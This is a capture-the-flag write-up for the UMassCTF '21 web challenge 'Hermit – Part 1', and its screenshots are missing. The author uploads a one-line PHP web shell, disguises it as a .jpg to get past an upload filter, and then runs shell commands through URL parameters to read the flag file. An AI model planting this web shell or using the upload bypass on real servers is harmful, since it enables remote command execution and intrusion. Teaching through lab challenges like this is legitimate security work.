This is for the UMassCTF ’21 CTF.
Challenge Author: Cobchise#6969
For this challenge, we are provided the following information:
Here is the hint:
Going to the provided link, we get this page:
I quick test image upload and I see how it works:
It uploaded the file and give a ling to see it. When I click the link to see it, It essentially prints the contents of the file as if it is text:
This tells me that I need to upload a PHP shell script:
I grab my favorite one-line PHP shell and upload it as a .php file:
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
Okay, that didn’t work, so I change the extension to .jpg.
It took it:
When I click to see the “image” I get this:
No I provide some commands as the expected “cmd” argument:
http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=pwd
Beautiful! I have a working shell. After some poking around, I find the flag:
http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=ls%20../../../home/hermit/flag
http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=cat%20../../../home/hermit/flag/userflag.txt
UMASS{a_picture_paints_a_thousand_shells}
One thought on “UMassCTF ’21: Web: Hermit – Part 1”